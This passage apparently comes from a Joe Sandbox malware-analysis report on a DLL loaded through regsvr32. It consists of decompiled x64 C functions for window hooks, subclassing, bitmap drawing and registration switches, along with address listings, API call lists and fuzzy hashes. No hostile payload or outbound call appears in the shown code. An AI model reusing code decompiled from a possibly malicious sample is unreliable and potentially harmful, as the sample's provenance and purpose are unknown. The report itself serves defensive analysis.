								r12d =  *(_t366 + 0xb8);
								_t360 = 0x10075e50 + _t336 * 2;
								while(1) {
									 *_t360 = 0;
									r8d = _t227;
									_t357 = 0x10075e50;
									GetTextExtentPoint32W(??, ??, ??, ??);
									r11d =  *(_t366 + 0x88);
									if(_t393 + _t390 + 0xc <= _t269) {
										break;
									}
									_t227 = _t227 - 1;
									_t360 = _t360 - 2;
									if(_t227 > 0) {
										continue;
									}
									break;
								}
								_t266 =  *((intOrPtr*)(_t366 + 0x68));
								_t393 = 0x10076060;
								goto L35;
								L43:
								r13d = r13d + 1;
								_t373 = r13d;
								_t183 = SendMessageW(??, ??, ??, ??);
							} while (_t183 != 0);
							goto L44;
						}
					}
				}
			}








































                                                                              0x10001430
                                                                              0x10001430
                                                                              0x10001430
                                                                              0x10001430
                                                                              0x10001430
                                                                              0x10001430
                                                                              0x1000143a
                                                                              0x1000143e
                                                                              0x10001442
                                                                              0x10001446
                                                                              0x1000144a
                                                                              0x1000144e
                                                                              0x10001452
                                                                              0x10001459
                                                                              0x1000145d
                                                                              0x10001460
                                                                              0x1000146e
                                                                              0x10001471
                                                                              0x10001477
                                                                              0x1000147a
                                                                              0x10001480
                                                                              0x10001484
                                                                              0x1000148d
                                                                              0x10001496
                                                                              0x100014ab
                                                                              0x100014ae
                                                                              0x100014bb
                                                                              0x100014be
                                                                              0x100014c6
                                                                              0x100014cd
                                                                              0x100014d4
                                                                              0x100014d8
                                                                              0x100014e3
                                                                              0x100014ea
                                                                              0x100014f1
                                                                              0x100014fc
                                                                              0x10001507
                                                                              0x1000150f
                                                                              0x10001526
                                                                              0x1000152f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1000151d
                                                                              0x1000151d
                                                                              0x10001531
                                                                              0x10001533
                                                                              0x1000153d
                                                                              0x1000153d
                                                                              0x10001540
                                                                              0x00000000
                                                                              0x10001535
                                                                              0x10001535
                                                                              0x10001537
                                                                              0x10001545
                                                                              0x1000154d
                                                                              0x10001555
                                                                              0x1000155f
                                                                              0x1000156a
                                                                              0x10001576
                                                                              0x1000157b
                                                                              0x10001583
                                                                              0x10001585
                                                                              0x1000158c
                                                                              0x10001595
                                                                              0x10001598
                                                                              0x10001598
                                                                              0x100015a1
                                                                              0x10001645
                                                                              0x1000164a
                                                                              0x10001656
                                                                              0x1000165e
                                                                              0x10001664
                                                                              0x10001673
                                                                              0x1000167b
                                                                              0x100015a7
                                                                              0x100015b0
                                                                              0x100015bb
                                                                              0x100015be
                                                                              0x100015c7
                                                                              0x100015ce
                                                                              0x100015e1
                                                                              0x100015f5
                                                                              0x100015fa
                                                                              0x10001606
                                                                              0x1000160e
                                                                              0x10001614
                                                                              0x10001623
                                                                              0x1000162b
                                                                              0x10001630
                                                                              0x10001630
                                                                              0x10001680
                                                                              0x10001688
                                                                              0x10001694
                                                                              0x100016a7
                                                                              0x100016ae
                                                                              0x100016b4
                                                                              0x100016bc
                                                                              0x100016c2
                                                                              0x100016c2
                                                                              0x10001696
                                                                              0x10001696
                                                                              0x1000169d
                                                                              0x1000169d
                                                                              0x100016c5
                                                                              0x100016cc
                                                                              0x100016d6
                                                                              0x100016de
                                                                              0x100016de
                                                                              0x100016e2
                                                                              0x100016e6
                                                                              0x100016ef
                                                                              0x100016f7
                                                                              0x100016fd
                                                                              0x10001701
                                                                              0x10001705
                                                                              0x10001710
                                                                              0x1000171f
                                                                              0x10001723
                                                                              0x10001728
                                                                              0x1000173b
                                                                              0x10001743
                                                                              0x10001746
                                                                              0x10001749
                                                                              0x1000174d
                                                                              0x10001751
                                                                              0x10001756
                                                                              0x10001756
                                                                              0x100016f7
                                                                              0x10001762
                                                                              0x1000176d
                                                                              0x10001776
                                                                              0x10001779
                                                                              0x10001779
                                                                              0x10001782
                                                                              0x1000178b
                                                                              0x10001793
                                                                              0x10001796
                                                                              0x100017b3
                                                                              0x100017cf
                                                                              0x100017d7
                                                                              0x100017dc
                                                                              0x100017e7
                                                                              0x100017ef
                                                                              0x100017f7
                                                                              0x100017fb
                                                                              0x100017fb
                                                                              0x10001806
                                                                              0x10001811
                                                                              0x1000181a
                                                                              0x10001821
                                                                              0x1000182b
                                                                              0x1000182f
                                                                              0x10001833
                                                                              0x1000183b
                                                                              0x10001855
                                                                              0x1000183d
                                                                              0x1000183d
                                                                              0x10001840
                                                                              0x1000184b
                                                                              0x10001850
                                                                              0x10001850
                                                                              0x1000185c
                                                                              0x10001866
                                                                              0x1000186c
                                                                              0x10001874
                                                                              0x10001878
                                                                              0x1000187c
                                                                              0x10001885
                                                                              0x1000188d
                                                                              0x10001897
                                                                              0x100018a5
                                                                              0x100018ad
                                                                              0x100018b8
                                                                              0x100018c0
                                                                              0x10001a81
                                                                              0x10001ac1
                                                                              0x10001ad9
                                                                              0x10001ad9
                                                                              0x10001ae4
                                                                              0x10001af4
                                                                              0x10001b02
                                                                              0x10001b02
                                                                              0x10001b15
                                                                              0x100018c6
                                                                              0x100018d0
                                                                              0x100018d0
                                                                              0x100018d7
                                                                              0x100018da
                                                                              0x100018ea
                                                                              0x100018f2
                                                                              0x100018fd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1000190a
                                                                              0x1000190e
                                                                              0x10001916
                                                                              0x10001918
                                                                              0x100019f4
                                                                              0x100019f4
                                                                              0x100019f7
                                                                              0x100019f7
                                                                              0x100019fc
                                                                              0x10001a08
                                                                              0x10001a0b
                                                                              0x10001a16
                                                                              0x10001a0d
                                                                              0x10001a10
                                                                              0x10001a12
                                                                              0x10001a12
                                                                              0x10001a10
                                                                              0x10001a0b
                                                                              0x10001a1f
                                                                              0x10001a2a
                                                                              0x10001a30
                                                                              0x10001a38
                                                                              0x10001a3c
                                                                              0x10001a40
                                                                              0x10001a49
                                                                              0x10001a4f
                                                                              0x10001a55
                                                                              0x00000000
                                                                              0x10001a55
                                                                              0x1000192a
                                                                              0x1000192d
                                                                              0x10001930
                                                                              0x10001936
                                                                              0x1000193e
                                                                              0x10001945
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1000195d
                                                                              0x1000196e
                                                                              0x10001975
                                                                              0x1000197b
                                                                              0x10001981
                                                                              0x10001986
                                                                              0x10001989
                                                                              0x100019db
                                                                              0x100019ea
                                                                              0x100019ef
                                                                              0x00000000
                                                                              0x100019ef
                                                                              0x1000198b
                                                                              0x10001993
                                                                              0x10001997
                                                                              0x10001997
                                                                              0x100019a8
                                                                              0x100019ab
                                                                              0x100019ae
                                                                              0x100019b4
                                                                              0x100019c3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100019c5
                                                                              0x100019c8
                                                                              0x100019ce
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100019ce
                                                                              0x100019d0
                                                                              0x100019d4
                                                                              0x00000000
                                                                              0x10001a5b
                                                                              0x10001a5f
                                                                              0x10001a6b
                                                                              0x10001a73
                                                                              0x10001a79
                                                                              0x00000000
                                                                              0x100018d0
                                                                              0x100018c0
                                                                              0x10001533

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ColorRect$ExtentPoint32Text$DrawFillFocuslstrlen$CopyImageList_LongWindow
                                                                              • String ID: $$...
                                                                              • API String ID: 3643364040-3938309010
                                                                              • Opcode ID: 52900c723d4077bb27428f3455815519bd726b0848797cb77a119dc16c7761be
                                                                              • Instruction ID: 6bdb69623a135598afc8012c6bf064d1edcefae5e714811e0f8133f0d4d949a9
                                                                              • Opcode Fuzzy Hash: 52900c723d4077bb27428f3455815519bd726b0848797cb77a119dc16c7761be
                                                                              • Instruction Fuzzy Hash: F5025976604BC18BE720CF65E8547DAB7A1F789B88F414116DE8A47B58CF78D989CF00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000DD88 Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 76libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                              • API String ID: 667068680-2451437823
                                                                              • Opcode ID: 80f7c53d27a79335ed7da8dc370a696dcdcb5df030f7e58615102b8471d7e653
                                                                              • Instruction ID: 72b4fad5aa72046d437693becf847735b3fb961ded23c5999e5311f939614251
                                                                              • Opcode Fuzzy Hash: 80f7c53d27a79335ed7da8dc370a696dcdcb5df030f7e58615102b8471d7e653
                                                                              • Instruction Fuzzy Hash: BD319570201F4082EA42EF50FD803E833A5FB1D791F86592AD5C946265EFFCA5D5CB21
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10025040 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 113stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmp
                                                                              • String ID: Automation$Embedding$Register$Regserver$Unregister$Unregserver$dde
                                                                              • API String ID: 1534048567-1547061805
                                                                              • Opcode ID: ec6ecf73da72fed1bb41768beab422f64d8003d4b4e5a76fcca6628ceffd0f5e
                                                                              • Instruction ID: b5370ce03df32f95e1dab41ac525a4c85354e4e9a0e780bd51dfcad3eb11d9de
                                                                              • Opcode Fuzzy Hash: ec6ecf73da72fed1bb41768beab422f64d8003d4b4e5a76fcca6628ceffd0f5e
                                                                              • Instruction Fuzzy Hash: C341BA71704B4086E725CF11B94538ABBA5FB4DBC9FD1020ADD8643B65EFB8CA94CB08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001B2D4 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 156windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000080,?), ref: 1001B2EF
                                                                              • LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000080,?), ref: 1001B309
                                                                              • GetDC.USER32 ref: 1001B425
                                                                              • CreateCompatibleBitmap.GDI32 ref: 1001B437
                                                                              • CreateCompatibleDC.GDI32 ref: 1001B448
                                                                              • SelectObject.GDI32 ref: 1001B457
                                                                              • StretchDIBits.GDI32 ref: 1001B4A8
                                                                              • SelectObject.GDI32 ref: 1001B4B4
                                                                              • DeleteDC.GDI32 ref: 1001B4BD
                                                                              • ReleaseDC.USER32 ref: 1001B4C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
                                                                              • String ID:
                                                                              • API String ID: 2481137294-3916222277
                                                                              • Opcode ID: 404d31d29763cc74f0948259a7c8100710968a49fe76b54eeeb324bc7e7313ac
                                                                              • Instruction ID: 84672ed1b624a31f07853291edeea50074e41d1f6e84060032819e74204f231d
                                                                              • Opcode Fuzzy Hash: 404d31d29763cc74f0948259a7c8100710968a49fe76b54eeeb324bc7e7313ac
                                                                              • Instruction Fuzzy Hash: 05510236601A408BEB54DF16AC443AE77A0FB8CBD9F514129DE8A8B721DF7CC495CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10013E28 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E10013E28(void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				signed int _v72;
				intOrPtr _v74;
				char _v584;
				char _v664;
				void* _v680;
				int _v688;
				char _v696;
				int _t30;
				int _t44;
				int _t45;
				void* _t60;
				signed long long _t62;
				signed long long _t66;
				signed long long _t67;
				void* _t69;
				signed long long _t103;
				intOrPtr* _t104;
				signed long long _t105;
				signed long long _t106;
				void* _t126;

				_t122 = __r11;
				_t119 = __r9;
				_t111 = __r8;
				_t52 = __edx;
				_t48 = __ebx;
				_t110 =  &_v680;
				_v680 = 0xfffffffe;
				_t66 =  *0x1006f4c8; // 0x6f13091946cb
				_t67 = _t66 ^  &_v680;
				_v72 = _t67;
				_t69 = __rdx;
				_t60 = __ecx;
				E10028C74(__ebx, __ecx, __edx, __ecx, _t67, 0x10071330, 0x10009864, __r8, __r9, __r11);
				_t103 = _t67;
				_t62 = _t67;
				_t51 = 0 | _t62 == 0x00000000;
				if(_t62 == 0) {
					E10016544();
					asm("int3");
				}
				if(_t60 == 3) {
					_t104 =  *(_t67 + 0x28);
					_t30 = E1000A57C(_t48, _t51, _t52, _t60, _t67, _t111, _t119, _t122);
					r13d =  *(_t67 + 0x28) & 0x000000ff;
					__eflags = _t104;
					if(__eflags != 0) {
						E1000A5F8(_t67,  &_v696,  *((intOrPtr*)(_t104 + 0x38)), _t111);
						E10011870(_t48, _t52, _t67, _t104, _t69, _t111, _t119, _t122);
						 *((intOrPtr*)( *_t104 + 0xa0))();
						 *((intOrPtr*)( *_t104 + 0x1e0))();
						_t105 = _t67;
						__imp__SetWindowLongPtrW();
						__eflags = _t67 - 0x10012418;
						if(_t67 != 0x10012418) {
							 *_t105 = _t67;
						}
						 *((long long*)(_t103 + 0x28)) = 0;
						__eflags = _v688;
						if(_v688 != 0) {
							_t51 = 0;
							__eflags = 0;
							E100094A0(_t67);
						}
						L21:
						CallNextHookEx();
						__eflags = r13d;
						if(r13d != 0) {
							UnhookWindowsHookEx();
							 *((long long*)(_t103 + 0x48)) = 0;
						}
						goto L24;
					}
					asm("bt dword [ebp+0x30], 0x1e");
					if(__eflags < 0) {
						goto L21;
					}
					__eflags = r13d;
					if(r13d != 0) {
						goto L21;
					}
					__eflags =  *0x10074898 - r13w; // 0x0
					if(__eflags != 0) {
						L12:
						__imp__GetClassLongPtrW();
						__eflags = _t30 -  *0x10074898;
						if(_t30 ==  *0x10074898) {
							goto L21;
						}
						L13:
						__imp__GetWindowLongPtrW();
						_t106 = _t67;
						__eflags = _t67;
						if(_t67 != 0) {
							GetPropW();
							__eflags = _t67;
							if(_t67 == 0) {
								SetPropW();
								GetPropW(??, ??);
								__eflags = _t67 - _t106;
								if(_t67 == _t106) {
									GlobalAddAtomW();
									__imp__SetWindowLongPtrW();
								}
							}
						}
						goto L21;
					}
					E1003A240(_t30, _t51, 0,  &_v664, 0x10009864, _t104);
					_v664 = _t126 + 0x50;
					_t51 = 0;
					_t30 = E1000F5A8(_t48, 0, 0, _t126 + 0x50, _t67,  &_v664, L"#32768",  &_v664, _t119, _t122);
					 *0x10074898 = _t30;
					__eflags = _t30;
					if(_t30 != 0) {
						goto L12;
					}
					r8d = 0x100;
					_t44 = GetClassNameW(??, ??, ??);
					__eflags = _t44;
					if(_t44 == 0) {
						goto L13;
					}
					_v74 = r13w;
					_t45 = E1003AE40( &_v584, L"#32768");
					__eflags = _t45;
					if(_t45 == 0) {
						goto L21;
					} else {
						goto L13;
					}
				} else {
					CallNextHookEx();
					L24:
					return E10038D20(_t51, _v72 ^ _t110);
				}
			}























                                                                              0x10013e28
                                                                              0x10013e28
                                                                              0x10013e28
                                                                              0x10013e28
                                                                              0x10013e28
                                                                              0x10013e31
                                                                              0x10013e38
                                                                              0x10013e41
                                                                              0x10013e48
                                                                              0x10013e4b
                                                                              0x10013e56
                                                                              0x10013e59
                                                                              0x10013e69
                                                                              0x10013e6e
                                                                              0x10013e73
                                                                              0x10013e76
                                                                              0x10013e7b
                                                                              0x10013e7d
                                                                              0x10013e82
                                                                              0x10013e82
                                                                              0x10013e86
                                                                              0x10013ea3
                                                                              0x10013ea7
                                                                              0x10013eac
                                                                              0x10013eb1
                                                                              0x10013eb4
                                                                              0x10013fee
                                                                              0x10013ffa
                                                                              0x10014005
                                                                              0x10014012
                                                                              0x10014019
                                                                              0x1001402e
                                                                              0x10014034
                                                                              0x10014037
                                                                              0x10014039
                                                                              0x10014039
                                                                              0x1001403c
                                                                              0x10014044
                                                                              0x10014049
                                                                              0x10014050
                                                                              0x10014050
                                                                              0x10014052
                                                                              0x10014052
                                                                              0x10014057
                                                                              0x10014066
                                                                              0x1001406f
                                                                              0x10014072
                                                                              0x10014078
                                                                              0x1001407e
                                                                              0x1001407e
                                                                              0x00000000
                                                                              0x10014086
                                                                              0x10013eba
                                                                              0x10013ebf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10013ec5
                                                                              0x10013ec8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10013ece
                                                                              0x10013ed6
                                                                              0x10013f50
                                                                              0x10013f58
                                                                              0x10013f5e
                                                                              0x10013f65
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10013f6b
                                                                              0x10013f73
                                                                              0x10013f79
                                                                              0x10013f7c
                                                                              0x10013f7f
                                                                              0x10013f92
                                                                              0x10013f98
                                                                              0x10013f9b
                                                                              0x10013faa
                                                                              0x10013fb6
                                                                              0x10013fbc
                                                                              0x10013fbf
                                                                              0x10013fc8
                                                                              0x10013fdd
                                                                              0x10013fdd
                                                                              0x10013fbf
                                                                              0x10013f9b
                                                                              0x00000000
                                                                              0x10013f7f
                                                                              0x10013ee6
                                                                              0x10013eeb
                                                                              0x10013efb
                                                                              0x10013efd
                                                                              0x10013f02
                                                                              0x10013f09
                                                                              0x10013f0c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10013f0e
                                                                              0x10013f1f
                                                                              0x10013f25
                                                                              0x10013f27
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10013f29
                                                                              0x10013f41
                                                                              0x10013f46
                                                                              0x10013f48
                                                                              0x00000000
                                                                              0x10013f4e
                                                                              0x00000000
                                                                              0x10013f4e
                                                                              0x10013e88
                                                                              0x10013e94
                                                                              0x10014089
                                                                              0x100140a8
                                                                              0x100140a8

                                                                              APIs
                                                                                • Part of subcall function 10028C74: EnterCriticalSection.KERNEL32 ref: 10028CF7
                                                                                • Part of subcall function 10028C74: TlsGetValue.KERNEL32 ref: 10028D09
                                                                                • Part of subcall function 10028C74: LeaveCriticalSection.KERNEL32 ref: 10028D25
                                                                              • CallNextHookEx.USER32 ref: 10013E94
                                                                              • GetClassNameW.USER32 ref: 10013F1F
                                                                              • GetClassLongPtrW.USER32 ref: 10013F58
                                                                              • GetWindowLongPtrW.USER32 ref: 10013F73
                                                                              • GetPropW.USER32 ref: 10013F92
                                                                              • SetPropW.USER32 ref: 10013FAA
                                                                              • GetPropW.USER32 ref: 10013FB6
                                                                              • GlobalAddAtomW.KERNEL32 ref: 10013FC8
                                                                              • SetWindowLongPtrW.USER32 ref: 10013FDD
                                                                                • Part of subcall function 1000F5A8: GetClassInfoExW.USER32 ref: 1000F5F5
                                                                                • Part of subcall function 1000F5A8: GetLastError.KERNEL32 ref: 1000F611
                                                                                • Part of subcall function 1000F5A8: SetLastError.KERNEL32 ref: 1000F62F
                                                                              • SetWindowLongPtrW.USER32 ref: 1001402E
                                                                              • CallNextHookEx.USER32 ref: 10014066
                                                                              • UnhookWindowsHookEx.USER32 ref: 10014078
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Long$ClassHookPropWindow$CallCriticalErrorLastNextSection$AtomEnterGlobalInfoLeaveNameUnhookValueWindows
                                                                              • String ID: #32768$AfxOldWndProc423
                                                                              • API String ID: 3032219398-2141921550
                                                                              • Opcode ID: bcaf5d164367aef62fa76eb66ac2b85e25d868f113d39c1f2e5644f26ccd73b2
                                                                              • Instruction ID: 032615c2e85d18da2af3c33c2e975c4f046a07dc6a45b3bc8cf1f644c0615e28
                                                                              • Opcode Fuzzy Hash: bcaf5d164367aef62fa76eb66ac2b85e25d868f113d39c1f2e5644f26ccd73b2
                                                                              • Instruction Fuzzy Hash: 0451B175300A8186EA12DB26EC143EA3360FB8DBD8F464125DE9E0B7A4DF79D9C6C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001EB74 Relevance: 24.2, APIs: 16, Instructions: 191windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 16%
                                                                              			E1001EB74(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* __rax, intOrPtr* __rcx, intOrPtr* __rdx, intOrPtr* __r8, void* __r11) {
				struct HWND__* _t64;
				void* _t76;
				void* _t98;
				intOrPtr _t113;
				long long _t116;
				long long _t117;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				intOrPtr _t149;
				long long _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t155;
				intOrPtr* _t157;
				long long _t158;

				_t153 = __r11;
				_t146 = __rdx;
				_t120 = __rcx;
				_t98 = __esi;
				_t77 = __ecx;
				_t76 = __ebx;
				r15d = 0;
				_t147 = __r8;
				r14d = __edx;
				_t119 = __rcx;
				if(__r8 == _t158) {
					E10016544();
					asm("int3");
				}
				_t113 =  *_t120;
				 *((intOrPtr*)(_t113 + 0x280))();
				_t149 = _t113;
				if(_t113 == _t158) {
					E10016544();
					asm("int3");
				}
				if(r14d != r15d &&  *((intOrPtr*)(_t113 + 0xe0)) != _t158) {
					_t113 =  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xe0))));
					 *((intOrPtr*)(_t113 + 0xb8))();
				}
				_t148 =  *((intOrPtr*)(_t119 + 0xf0));
				r13d = r15d;
				while(_t148 != _t158) {
					_t155 = _t148;
					if(_t148 == _t158) {
						L26:
						E10016544();
						asm("int3");
						L27:
						 *((long long*)(_t119 + 0x138)) = _t158;
						GetDlgItem(??, ??);
						if(_t113 != _t158) {
							GetDlgItem();
							if(_t113 != _t158) {
								r8d = 0xea21;
								SetWindowLongW(??, ??, ??);
							}
							r8d = 0xe900;
							SetWindowLongW(??, ??, ??);
						}
						r13d = 1;
						if( *((intOrPtr*)(_t147 + 8)) != _t158) {
							r8d = r13d;
							InvalidateRect(??, ??, ??);
							_t146 =  *((intOrPtr*)(_t147 + 8));
							SetMenu(??, ??);
						}
						if( *((intOrPtr*)(_t149 + 0xe0)) != _t158) {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t149 + 0xe0)))) + 0xb8))();
						}
						_t114 =  *_t119;
						 *((intOrPtr*)( *_t119 + 0x290))();
						if( *_t147 != 0xe900) {
							GetDlgItem();
						}
						ShowWindow();
						 *((long long*)(_t119 + 0xb8)) =  *((intOrPtr*)(_t147 + 0x28));
						return E1001CFD8(_t76, _t77, r13d, 0xe900, _t114, _t119, _t146,  *((intOrPtr*)(_t147 + 0x28)));
					}
					_t157 =  *((intOrPtr*)(_t155 + 0x10));
					_t148 =  *_t148;
					if(_t157 == _t158) {
						E10016544();
						asm("int3");
						goto L26;
					}
					r15d = GetDlgCtrlID() & 0x0000ffff;
					_t8 = _t158 - 0xe800; // -59392
					_t113 = _t8;
					if(_t113 <= 0x1f) {
						_t9 = _t158 - 0xe800; // -59392
						_t77 = _t9;
						 *(_t151 + 0x80) = 1 << _t9;
						if( *((intOrPtr*)( *_t157 + 0x2a8))() != 0) {
							r13d = r13d |  *(_t151 + 0x80);
						}
						_t113 =  *_t157;
						if( *((intOrPtr*)(_t113 + 0x2b8))() == 0 || _t158 != 0xe81f) {
							r8d =  *(_t147 + 0x10);
							r9d = 1;
							_t146 = _t157;
							r8d = r8d &  *(_t151 + 0x80);
							E1001E4D8(_t77, _t113, _t146);
						}
					}
					r15d = 0;
				}
				 *(_t147 + 0x10) = r13d;
				if(r14d == r15d) {
					goto L27;
				}
				_t116 =  *((intOrPtr*)(_t147 + 0x20));
				 *((long long*)(_t119 + 0x138)) = _t116;
				E1001CFD8(_t76, _t77, 0, _t98, _t116, _t119, _t146, _t153);
				GetDlgItem(??, ??);
				_t150 = _t116;
				ShowWindow(??, ??);
				GetMenu(??);
				 *((long long*)(_t147 + 8)) = _t116;
				if(_t116 != _t158) {
					_t23 = _t146 + 1; // 0x1
					r8d = _t23;
					InvalidateRect(??, ??, ??);
					SetMenu(??, ??);
					 *(_t119 + 0x170) =  *(_t119 + 0x170) & 0xfffffffe;
				}
				_t117 =  *((intOrPtr*)(_t119 + 0xb8));
				 *((long long*)(_t147 + 0x28)) = _t117;
				 *((long long*)(_t119 + 0xb8)) = _t158;
				_t64 = E1001D640(_t77, _t117, _t119, _t146);
				if( *_t147 != 0xe900) {
					_t64 = GetDlgItem();
					_t150 = _t117;
				}
				if(_t150 == _t158) {
					return _t64;
				} else {
					r8d = 0xea21;
					return SetWindowLongW(??, ??, ??);
				}
			}





















                                                                              0x1001eb74
                                                                              0x1001eb74
                                                                              0x1001eb74
                                                                              0x1001eb74
                                                                              0x1001eb74
                                                                              0x1001eb74
                                                                              0x1001eb85
                                                                              0x1001eb88
                                                                              0x1001eb8b
                                                                              0x1001eb91
                                                                              0x1001eb94
                                                                              0x1001eb96
                                                                              0x1001eb9b
                                                                              0x1001eb9b
                                                                              0x1001eb9c
                                                                              0x1001eb9f
                                                                              0x1001eba8
                                                                              0x1001ebab
                                                                              0x1001ebad
                                                                              0x1001ebb2
                                                                              0x1001ebb2
